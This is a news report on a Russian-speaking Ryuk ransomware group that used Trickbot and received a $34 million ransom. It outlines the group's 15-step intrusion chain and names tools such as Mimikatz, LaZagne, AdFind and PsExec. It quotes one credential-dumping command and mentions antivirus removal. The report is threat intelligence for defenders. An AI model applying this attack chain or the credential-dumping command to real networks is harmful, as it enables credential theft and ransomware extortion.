A Russian-speaking cybercriminal group, which attacked high-income companies and distributed Ryuk ransomware using Trickbot malware, received $34 million from one of its victims for a key to recover encrypted files.
Designated as group “one” according to the identification obtained from the Trickbot botnet, which facilitates the deployment of Ryuk on the networks of the companies under attack, it is quite indiscriminate in its victims.According to Vitaly Kremez, a specialist at Advanced Intelligence, the recent victims of the “one” group include technological and energy companies, financial services, healthcare organizations and government agencies.
According to the October report of the information security company Check Point, in the third quarter of 2020, the group attacked an average of 20 victims per week.
“The average ransom received by Ryuk operators is 48 bitcoins (about $750,000), and since 2018 they have managed to ‘earn’ $150 million in total. Cybercriminals negotiate with their victims in a harsh manner and almost never show leniency”, – said Vitaly Kremez.
The largest confirmed ransom that Group One managed to get is 2.2 thousand bitcoins (about $ 34 million). After analyzing this attack, the researcher determined that the attack consists of 15 steps to find available hosts on the network, steal administrator credentials, and deploy Ryuk ransomware.
The attackers use in the attack available software (mostly open source) from the arsenal of red teams of security testers: Mimikatz, PowerShell PowerSploit, LaZagne, AdFind, Bloodhound, and PsExec.
The attack consists of 15 points:
- Researching the domain using the “Invoke-DACheck” script;
- Collecting host passwords using the Mimikatz command “mimikatz’s sekurlsa :: logonpasswords”;
- Returning the token to its original state and creating a token for the administrative comment from the data obtained using Mimikat
- Browse the host network using “net view”;
- Scanning ports for FTP, SSH, SMB, RDP and VNC protocols;
- Creation of a list of accesses on available hosts;
- Downloading a set of tools for searching Active Directory “AdFind” with batch script “adf.bat” from “net view” and hosts with scanned ports;
- Displaying the name of the anti-virus solution used on the host using the “WMIC” command;
- Download the multifunctional password recovery tool LaZagne to scan the host;
- Removal of password recovery tool;
- Launch ADFind and save the received data;
- Removal of artifacts of the ADFind tool and loading the obtained data;
- Providing full net share access for everyone for Ryuk to use;
- Software download for remote execution of PSExec and prepared network hosts, removal of anti-virus solutions;
- Downloading batch scripts for execution and network hosts, launching Ryuk with PSExec on behalf of various compromised users.
Let me remind you that recently Tech companies and government agencies have eliminated the TrickBot malware infrastructure, although some information security experts say that Trickbot is quite tenacious and may be resurrected.